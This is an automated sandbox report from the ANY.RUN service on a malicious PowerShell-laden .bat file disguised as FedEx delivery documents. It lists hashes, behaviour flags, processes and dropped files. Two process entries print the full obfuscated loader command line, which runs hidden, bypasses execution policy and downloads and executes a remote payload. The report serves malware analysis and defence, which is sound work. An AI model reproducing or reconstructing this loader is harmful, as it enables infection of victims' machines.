File name:

awb_fedex_documents_delivery_16_04_2025_0000000000000_doc.bat

Full analysis: https://app.any.run/tasks/d4d91c1a-ae20-47e6-965f-59dfd8f4ef43
Verdict: Malicious activity
Analysis date: April 17, 2025, 06:11:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (8330), with no line terminators
MD5:

827E71FC46BC0B50A9DEB848F55C37ED

SHA1:

856BD42FA29844C6746120BE63125113ECBFC53D

SHA256:

8F9E6B838313AAA8CF58D2466374BFD6D8C674260CC823316BAE1C688CD7CB24

SSDEEP:

192:lohotHqmkDEi55+C3/L1QEq5a/H75KTTTy9RWwc:+v75+fnYITy7WX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 616)
      • powershell.exe (PID: 7796)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6872)
      • powershell.exe (PID: 7956)

  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 616)
      • powershell.exe (PID: 7796)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 7796)
      • powershell.exe (PID: 616)

  • INFO

    • Checks proxy server information

      • slui.exe (PID: 7744)

    • Reads the software policy settings

      • slui.exe (PID: 7744)
      • slui.exe (PID: 728)

    • Manual execution by a user

      • powershell.exe (PID: 7796)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7956)
      • powershell.exe (PID: 6872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
142
Monitored processes
9
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe powershell.exe no specs slui.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
616"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\awb_fedex_documents_delivery_16_04_2025_0000000000000_doc.bat.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
728"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2148C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
3176\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6872"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "Get-Service;='func';Get-History;+='t';Get-History;+='i';=Get-History;+='on:';=Get-History;(ni -p -n Underhandlere -value { param ();=6;do {+=[];+=7} until(![])});(ni -p -n Brawer -value {param ();.() ()});ConvertTo-Html;=Underhandlere 'SubopeNArvefjE LivsvtRovere.Abuttew';+=Underhandlere 'ParkerEYnglenbMonomacChesteLene igI gaverE ForegnFair,st';=Underhandlere ' TremeMTa,umao TidobzThermoiAv riclUnitublSikke.a Dem n/';=Underhandlere ' Sh.rtTDmninglFiskeksCharme1Rulleb2';='Frygte[MiscodNEffekteCalmsbTOpposi. DentiS GloheEChrom rSikk rvConichIHiero.C vangeBezalePAfmontoFerieliAngletNDeskvltFrds lmUnsec aBrodern,iffigAMisgragunp,rseSkridrr Marat]Overgu:Demire:Cease sFi enaeTrind cbetnktuCalifaR C,mbeiDeferetSloughYTube oPAktiv RKameraO Taft TUdpeg,OAftenkcTal owOMgl.rvLTitule= Togue$ IdiotmBandusOProdukLisltteOWeakhetComplihWidoweRConcerUSmaltiS';+=Underhandlere 'helaar5Var di.farin 0Thulia Perosm(LuftskWudskaei TricanLatchmdStoddeoUnderrwDecretsTurtel KmpehjNAna ysTHikkes Limfj1Udpols0 Sta s.,ammen0Indeho; Tross Ep.diWDw lleiPygmern Sygej6U eneu4Tydni ;Skkelb Flimflxrestwa6 revho4Haneka; ostri AfpresrMan.ervDolmer: Afk r1 Berni3 Be vi7C mono.Tilvar0Aeschy)manno BeholdGAllo teak obacBel,ggkIncessoN,cleo/Ect pi2Vej.me0Plaype1Domkap0Drivga0Autosv1 rumpe0 ,nipl1Boatin AmarilFOveriniCylphorUddanne Sk kkfInte ko lenitx urrev/Ath ep1,ntige3Existe7Feltun.Dybfro0';=Underhandlere 'SmagfrUOpsuges verreEHeterorCercop-UfordjAMiscongInflatEKonvolN Inputt';=Underhandlere 'Bermudh LicattE ecratfratryp OptalsPlanni:t pebe/ Neuro/PhoenisAfstnimRhom,ochvedoms E,igrhFravriiRhodo,pUns.abpSe seeiBenefinOutaddgIcterodbreadbl MonachSlettel .ders.PerisccSt,nino ountemEthyle/CaulkeTUnfraceElaidioAnskafrS rmlkiMochudeHegn srSemine.SerenosHah emmBekommi';=Underhandlere 'Kvitte>';=Underhandlere ' Vatnii,gatizeOmstrux';='skraalinier';='\Skilte.Ove';Brawer (Underhandlere 'Kvival$ dscelgWilderL idenOPam erbYamsenAFian eLGregar:AngolaPVeltfarAramuroBe diepCircleYSumm tL PerinHsolemnEAktualXUndertEDisjundUnrosirKana eIOve.diN SheddE dtage8 No er1 Kelti= opul$ InceseCablelNBlanksvHvl pa:SpermaARe.lisPNonconPCamphadT.ansga tomruT Brne ablathe+fortr. rfereO .ontiC RundsC Amf,bo ReconiDelm tDFracasaVeintaL');Brawer (Underhandlere ' Tegne isOHalvdrbUrenl,aBasswolAtoned:SirenekKaraktAToonsmPHenn,sIRed kitSknjomA LaypelAfmattfNo opeoBoughdrNondefkOverl LEvolutAF toteR InkasiPhysi nIntersgNonsube Acc.pRA.slerNRige,seS,olinS Obduc=Karika stkBjergsg artotEShini NLymph.SKontraiUpgetnSTabslik Citra. HdrensMassrepTungefL TaketI Samfrt bam u(,romat bsenEdobbe pJur,lmNLaborae StoleYtu.pbaSDomest)');Brawer (Underhandlere );=[0];=(Underhandlere 'Overwo ibil mpuncOKatipuBInc,ndAPolyhelAd pte: BefalV SyrerRSu condConsisIrenuncFUmyndiOB llioRSammensOctop KDumpniYUnexced TekninCharacIfossilnSportsg maaleeFolk trRepr mNEu uchEsepara=Samm nNInterpe enlydW Und.r-Reeks,o Gasp bOvul tJBacklaeA toinCUninittIndgre Jaska sSpunsvYOpp.nes genneTCapil.EWildcam Gimp,.Klo ed.tSIdyll EIrrepue rytlJOrk,tle ntirerKiksesE');Brawer ();Brawer (Underhandlere ' Pa.il umaV TumplrArgentdSoliloiRefer,f KartaoIndberrLarkersRenholk tyrky Rhom.d Guds,nFr,teui azopan SkoddgCowie,eResembr Frim nPaatrne Trill.HoggerH E enpeFrotteaSkra.sdOverbaeSmaa rrSkraass ocacc[ Conve rocRecensolillenmOverflpScaldfeUnder nLinolesLi,ograCon petPeanstoOve elr KetonySuilli]Bagsid=Dudi,d FiskaiGldss,l MilielE asmiaDryssebUkrnkel lankie');=Underhandlere 'RemuneDSkvisnoPer chwGuttl,nHalvfjl EthyloenshriaDogmerd AbstiFProdatiBrgendl trose';=Underhandlere 'Folkeb.hiVDatainrCha oid OverdiPoleaxf GenopoAftaltrDubiocsAfkro kEls vrySirupsd FdselnNvnin i ructnOv,rfegK mmateFondsarFugtplnAllergeBogien. Kulde$ Man.rDGrnsefiBaggrueTitalssGargeteUntownlDist aoOvermolSwobbeiDa ligeArter rpastelnSesamfeAppet .SystemIGennemnBumpervRichenoa.ilinkLaminae Chunk(C licu lg Tiptiedupeabn Aftlls BibliiThurs.sU.satakEnn ie,Presoa isleai istrilCo,acocUnvituhUsma.eeSetterrMilieudF rsde)';=;Brawer (Underhandlere 'idlefu ohegCentriL rivatoEditorBUnimmiaEksporL smint:FremtuS romaieSoundhKSkygg O Red lnMyosindH ggesLAss.rtJ D talTTwosconDeplorAEftertNAnlgsgT Ba giEPiteouNrein.asCircu 1Ormstu8 Tands2 Payen=candle(SrgeraT Crocke A duoSTankekTOmvlte-BugginPTran paBiprodtMesanshRhyth, idioti$ Ba,eopSkibs.ITupmanlForheec.niverhBilleteLdervaRPer etdFaktur)');while (!) {Brawer (Underhandlere 'Channe$ Bib,lgLympholDreadloAfmrknbPhilanaConv llMushro:for,enTAircrea Ter.inSequendFo pans AnasttRece paEtaminnUltramg Sl de=Congre$ EncheoFjendtocamelifErklriiF uidieDerades Sorg t') ;Brawer ;Brawer (Underhandlere 'Frems.[GastroTSand.lhAnalgeRPorcelERhodopaBerg iD ByrewiPresbyNInculcGHyld,b.A.cumuTErigerh OrnitR resse UdligATes,niDHinden] Brems:Disrup:AnpartsT nderLBottomESdekorE kingPSh ffl(N vnku4Sjleka0h ltal0Am dss0 Plato)');Brawer (Underhandlere 'Forudb igaLLeddegOMultivbOosterA KargaL Filth:Forhj.sGepar.EElfi hKN cleaoSocialNTrochoDCounteLCurulejRandinTSkulkinB.otanALogicanSteamsTSjofelekellayNMilitas Tjalk1Givetg8Reputi2Detron= Norma(TumbleTRa gleEMedbriSCykeltt tachi-Dautiep MaldiaForuddtRwandaHPrecio Samme,.anelbiEngendlPreelec koreohA,mospe grignrTimot dBifoca)') ;Brawer (Underhandlere 'Rei te eOSpeciebTilmelaScabblL nter:IrrefrBUbevisRSkingeaWheelbN mbryocLsepl.aBrogedR FaltedSmaaspiFi,ancE DisanRVer en=Odises,aag DavoclDorp,rOBesgscbMedicaa rnthsLDetail:SldefavDeo.idOSpejleIErwindcG,oponEprivilrDelinqsBrandl+Ti.ghu+ Rotar%% A lie$ MorsekP romeaSuperbP,ubparI Uparrt UnjudAnugaetl Fo tiFForudsOMarinbrU exorkV reafLrentega KannerValdemIKonfeknLow rcGLenslieSs ortRHea qunAarsv e Sjusss Deriv.Til igC.elecaODerib usexilln Un emt') ;=[]}=386805;=32186;Brawer (Underhandlere 'Cica r$ FlormGRamforlUfriviO AdvokBM tsleA apr oLMadda : RigsokGlassboWaggabn yttercEkslibEPersonRForsaaTHum ugeSt,pulr ipleunFamiliEsuperh Blimpu=Ergoti bergljgVidvine.reamcTRataks-Syvendc BoundoTiggerNIgnoratLilliaeXylocaN blephTUnshir Methac.pRe.rseIUnderpLAntim.CKredi HMaagereUncircrLinebrd');Brawer (Underhandlere ' Psy.o uoT blenbToccataSeden lSportf: MacroFUnal.hr PrograPotenssImmeubk In,rar,cheroi Seks vH,gromeNauseolLivie,sPara,teRntgenrSrverisSrge a olati=Utilgn Reinte[ C.aguSPlieleyTelefosB illatA.ioneebem ndmBrdebe.Kat,onCRefereoDisnatnUninsuvHeteroeRea,errBar attP rall]Uncons:Auskul: PederFBlegrdr AllegoUltralmkonnisBBevisbaCoronesde,rideMarian6 ydame4barselSD otictMat marMur foiOverspnMoussegCafeer(Ci,her$ Alko kKronraoProtokn llesmcNeuropeChimerrStiligtGenerae ombrerkondennAbe deeAttes.)');Brawer (Underhandlere 'Lympha PhylulNdsignOLapillbForsunAOilfielUn,oil:Trmn ecArteriy C figl AlvorI AftenNSystemd eoperFormiaoUnclaidNonjureFormidN Levo,d UdfrirBiblioIPersonTSocialE Afmel T leva= Udela strik[R otinSaerocyyPudevasBrfrugTBehelperisla mAndema.SpilletModvi,ERessesXAhartaT Krab..Canni.EMade.eNAssyric ndrrsOKidskidKern lIBevidnnwastingUnd og]Assyro: Biolo:,nspiraPantomsRegardc DupleIsensiliC urma.he visGlrredseDetaljT TrainS RehamTVristeRIronisi Prea nSlownegBehatt(Talsys,tirSculpiAOverjesNgl,stkInviscR SenlaietioloVRootefEMagienLTra.iks Brna eA gelirSuffusSBortva)');Brawer (Underhandlere 'Trestr ChrisoAnthroBPeristAVrede.L Trans:ThightFStockcjSenatoe Nobb r Graphn ResunTOpera OPedan GKortenEAccounTkhayal=Octase$ OrinaC BarmaY Ctsuil TakroiNe,orenForbldD SvartRRekordOFjantsD,lodseeBvlsukNFabrikd Greenr,orarbiGastr TFarraneSynkre.FordybS keletUImpropbEk trasPatr.nt langeR Dipsbi BrothN OversgFl ure(Gipseh.iMFraserePse hozBeskftuB,nedizFritu AAspara,So,tse$ Low,ibGrapneAUdskr WNationD CovarSBeskdet oktorrDiscomO lkohoTRelinq)');Brawer ;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
7744C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7796"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass "C:\Users\admin\Desktop\awb_fedex_documents_delivery_16_04_2025_0000000000000_doc.bat.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7804\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7956"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "Get-Service;='func';Get-History;+='t';Get-History;+='i';=Get-History;+='on:';=Get-History;(ni -p -n Underhandlere -value { param ();=6;do {+=[];+=7} until(![])});(ni -p -n Brawer -value {param ();.() ()});ConvertTo-Html;=Underhandlere 'SubopeNArvefjE LivsvtRovere.Abuttew';+=Underhandlere 'ParkerEYnglenbMonomacChesteLene igI gaverE ForegnFair,st';=Underhandlere ' TremeMTa,umao TidobzThermoiAv riclUnitublSikke.a Dem n/';=Underhandlere ' Sh.rtTDmninglFiskeksCharme1Rulleb2';='Frygte[MiscodNEffekteCalmsbTOpposi. DentiS GloheEChrom rSikk rvConichIHiero.C vangeBezalePAfmontoFerieliAngletNDeskvltFrds lmUnsec aBrodern,iffigAMisgragunp,rseSkridrr Marat]Overgu:Demire:Cease sFi enaeTrind cbetnktuCalifaR C,mbeiDeferetSloughYTube oPAktiv RKameraO Taft TUdpeg,OAftenkcTal owOMgl.rvLTitule= Togue$ IdiotmBandusOProdukLisltteOWeakhetComplihWidoweRConcerUSmaltiS';+=Underhandlere 'helaar5Var di.farin 0Thulia Perosm(LuftskWudskaei TricanLatchmdStoddeoUnderrwDecretsTurtel KmpehjNAna ysTHikkes Limfj1Udpols0 Sta s.,ammen0Indeho; Tross Ep.diWDw lleiPygmern Sygej6U eneu4Tydni ;Skkelb Flimflxrestwa6 revho4Haneka; ostri AfpresrMan.ervDolmer: Afk r1 Berni3 Be vi7C mono.Tilvar0Aeschy)manno BeholdGAllo teak obacBel,ggkIncessoN,cleo/Ect pi2Vej.me0Plaype1Domkap0Drivga0Autosv1 rumpe0 ,nipl1Boatin AmarilFOveriniCylphorUddanne Sk kkfInte ko lenitx urrev/Ath ep1,ntige3Existe7Feltun.Dybfro0';=Underhandlere 'SmagfrUOpsuges verreEHeterorCercop-UfordjAMiscongInflatEKonvolN Inputt';=Underhandlere 'Bermudh LicattE ecratfratryp OptalsPlanni:t pebe/ Neuro/PhoenisAfstnimRhom,ochvedoms E,igrhFravriiRhodo,pUns.abpSe seeiBenefinOutaddgIcterodbreadbl MonachSlettel .ders.PerisccSt,nino ountemEthyle/CaulkeTUnfraceElaidioAnskafrS rmlkiMochudeHegn srSemine.SerenosHah emmBekommi';=Underhandlere 'Kvitte>';=Underhandlere ' Vatnii,gatizeOmstrux';='skraalinier';='\Skilte.Ove';Brawer (Underhandlere 'Kvival$ dscelgWilderL idenOPam erbYamsenAFian eLGregar:AngolaPVeltfarAramuroBe diepCircleYSumm tL PerinHsolemnEAktualXUndertEDisjundUnrosirKana eIOve.diN SheddE dtage8 No er1 Kelti= opul$ InceseCablelNBlanksvHvl pa:SpermaARe.lisPNonconPCamphadT.ansga tomruT Brne ablathe+fortr. rfereO .ontiC RundsC Amf,bo ReconiDelm tDFracasaVeintaL');Brawer (Underhandlere ' Tegne isOHalvdrbUrenl,aBasswolAtoned:SirenekKaraktAToonsmPHenn,sIRed kitSknjomA LaypelAfmattfNo opeoBoughdrNondefkOverl LEvolutAF toteR InkasiPhysi nIntersgNonsube Acc.pRA.slerNRige,seS,olinS Obduc=Karika stkBjergsg artotEShini NLymph.SKontraiUpgetnSTabslik Citra. HdrensMassrepTungefL TaketI Samfrt bam u(,romat bsenEdobbe pJur,lmNLaborae StoleYtu.pbaSDomest)');Brawer (Underhandlere );=[0];=(Underhandlere 'Overwo ibil mpuncOKatipuBInc,ndAPolyhelAd pte: BefalV SyrerRSu condConsisIrenuncFUmyndiOB llioRSammensOctop KDumpniYUnexced TekninCharacIfossilnSportsg maaleeFolk trRepr mNEu uchEsepara=Samm nNInterpe enlydW Und.r-Reeks,o Gasp bOvul tJBacklaeA toinCUninittIndgre Jaska sSpunsvYOpp.nes genneTCapil.EWildcam Gimp,.Klo ed.tSIdyll EIrrepue rytlJOrk,tle ntirerKiksesE');Brawer ();Brawer (Underhandlere ' Pa.il umaV TumplrArgentdSoliloiRefer,f KartaoIndberrLarkersRenholk tyrky Rhom.d Guds,nFr,teui azopan SkoddgCowie,eResembr Frim nPaatrne Trill.HoggerH E enpeFrotteaSkra.sdOverbaeSmaa rrSkraass ocacc[ Conve rocRecensolillenmOverflpScaldfeUnder nLinolesLi,ograCon petPeanstoOve elr KetonySuilli]Bagsid=Dudi,d FiskaiGldss,l MilielE asmiaDryssebUkrnkel lankie');=Underhandlere 'RemuneDSkvisnoPer chwGuttl,nHalvfjl EthyloenshriaDogmerd AbstiFProdatiBrgendl trose';=Underhandlere 'Folkeb.hiVDatainrCha oid OverdiPoleaxf GenopoAftaltrDubiocsAfkro kEls vrySirupsd FdselnNvnin i ructnOv,rfegK mmateFondsarFugtplnAllergeBogien. Kulde$ Man.rDGrnsefiBaggrueTitalssGargeteUntownlDist aoOvermolSwobbeiDa ligeArter rpastelnSesamfeAppet .SystemIGennemnBumpervRichenoa.ilinkLaminae Chunk(C licu lg Tiptiedupeabn Aftlls BibliiThurs.sU.satakEnn ie,Presoa isleai istrilCo,acocUnvituhUsma.eeSetterrMilieudF rsde)';=;Brawer (Underhandlere 'idlefu ohegCentriL rivatoEditorBUnimmiaEksporL smint:FremtuS romaieSoundhKSkygg O Red lnMyosindH ggesLAss.rtJ D talTTwosconDeplorAEftertNAnlgsgT Ba giEPiteouNrein.asCircu 1Ormstu8 Tands2 Payen=candle(SrgeraT Crocke A duoSTankekTOmvlte-BugginPTran paBiprodtMesanshRhyth, idioti$ Ba,eopSkibs.ITupmanlForheec.niverhBilleteLdervaRPer etdFaktur)');while (!) {Brawer (Underhandlere 'Channe$ Bib,lgLympholDreadloAfmrknbPhilanaConv llMushro:for,enTAircrea Ter.inSequendFo pans AnasttRece paEtaminnUltramg Sl de=Congre$ EncheoFjendtocamelifErklriiF uidieDerades Sorg t') ;Brawer ;Brawer (Underhandlere 'Frems.[GastroTSand.lhAnalgeRPorcelERhodopaBerg iD ByrewiPresbyNInculcGHyld,b.A.cumuTErigerh OrnitR resse UdligATes,niDHinden] Brems:Disrup:AnpartsT nderLBottomESdekorE kingPSh ffl(N vnku4Sjleka0h ltal0Am dss0 Plato)');Brawer (Underhandlere 'Forudb igaLLeddegOMultivbOosterA KargaL Filth:Forhj.sGepar.EElfi hKN cleaoSocialNTrochoDCounteLCurulejRandinTSkulkinB.otanALogicanSteamsTSjofelekellayNMilitas Tjalk1Givetg8Reputi2Detron= Norma(TumbleTRa gleEMedbriSCykeltt tachi-Dautiep MaldiaForuddtRwandaHPrecio Samme,.anelbiEngendlPreelec koreohA,mospe grignrTimot dBifoca)') ;Brawer (Underhandlere 'Rei te eOSpeciebTilmelaScabblL nter:IrrefrBUbevisRSkingeaWheelbN mbryocLsepl.aBrogedR FaltedSmaaspiFi,ancE DisanRVer en=Odises,aag DavoclDorp,rOBesgscbMedicaa rnthsLDetail:SldefavDeo.idOSpejleIErwindcG,oponEprivilrDelinqsBrandl+Ti.ghu+ Rotar%% A lie$ MorsekP romeaSuperbP,ubparI Uparrt UnjudAnugaetl Fo tiFForudsOMarinbrU exorkV reafLrentega KannerValdemIKonfeknLow rcGLenslieSs ortRHea qunAarsv e Sjusss Deriv.Til igC.elecaODerib usexilln Un emt') ;=[]}=386805;=32186;Brawer (Underhandlere 'Cica r$ FlormGRamforlUfriviO AdvokBM tsleA apr oLMadda : RigsokGlassboWaggabn yttercEkslibEPersonRForsaaTHum ugeSt,pulr ipleunFamiliEsuperh Blimpu=Ergoti bergljgVidvine.reamcTRataks-Syvendc BoundoTiggerNIgnoratLilliaeXylocaN blephTUnshir Methac.pRe.rseIUnderpLAntim.CKredi HMaagereUncircrLinebrd');Brawer (Underhandlere ' Psy.o uoT blenbToccataSeden lSportf: MacroFUnal.hr PrograPotenssImmeubk In,rar,cheroi Seks vH,gromeNauseolLivie,sPara,teRntgenrSrverisSrge a olati=Utilgn Reinte[ C.aguSPlieleyTelefosB illatA.ioneebem ndmBrdebe.Kat,onCRefereoDisnatnUninsuvHeteroeRea,errBar attP rall]Uncons:Auskul: PederFBlegrdr AllegoUltralmkonnisBBevisbaCoronesde,rideMarian6 ydame4barselSD otictMat marMur foiOverspnMoussegCafeer(Ci,her$ Alko kKronraoProtokn llesmcNeuropeChimerrStiligtGenerae ombrerkondennAbe deeAttes.)');Brawer (Underhandlere 'Lympha PhylulNdsignOLapillbForsunAOilfielUn,oil:Trmn ecArteriy C figl AlvorI AftenNSystemd eoperFormiaoUnclaidNonjureFormidN Levo,d UdfrirBiblioIPersonTSocialE Afmel T leva= Udela strik[R otinSaerocyyPudevasBrfrugTBehelperisla mAndema.SpilletModvi,ERessesXAhartaT Krab..Canni.EMade.eNAssyric ndrrsOKidskidKern lIBevidnnwastingUnd og]Assyro: Biolo:,nspiraPantomsRegardc DupleIsensiliC urma.he visGlrredseDetaljT TrainS RehamTVristeRIronisi Prea nSlownegBehatt(Talsys,tirSculpiAOverjesNgl,stkInviscR SenlaietioloVRootefEMagienLTra.iks Brna eA gelirSuffusSBortva)');Brawer (Underhandlere 'Trestr ChrisoAnthroBPeristAVrede.L Trans:ThightFStockcjSenatoe Nobb r Graphn ResunTOpera OPedan GKortenEAccounTkhayal=Octase$ OrinaC BarmaY Ctsuil TakroiNe,orenForbldD SvartRRekordOFjantsD,lodseeBvlsukNFabrikd Greenr,orarbiGastr TFarraneSynkre.FordybS keletUImpropbEk trasPatr.nt langeR Dipsbi BrothN OversgFl ure(Gipseh.iMFraserePse hozBeskftuB,nedizFritu AAspara,So,tse$ Low,ibGrapneAUdskr WNationD CovarSBeskdet oktorrDiscomO lkohoTRelinq)');Brawer ;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 157
Read events
17 157
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
7
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:75B35BF3E701352388D3A901ABF7CF91
SHA256:C82BE66347510C4076F102F62B3B3A818B5A6A3871CDBFF1464DE48DAC67BBE6
616powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xnqq2mad.xlp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c016.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
616powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2tofzflb.qlh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6872powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kmxqnwur.4tn.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
616powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MFQIZVBGE4Z2L6Q5MBAK.tempbinary
MD5:75B35BF3E701352388D3A901ABF7CF91
SHA256:C82BE66347510C4076F102F62B3B3A818B5A6A3871CDBFF1464DE48DAC67BBE6
7796powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0p52gxwv.2xb.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
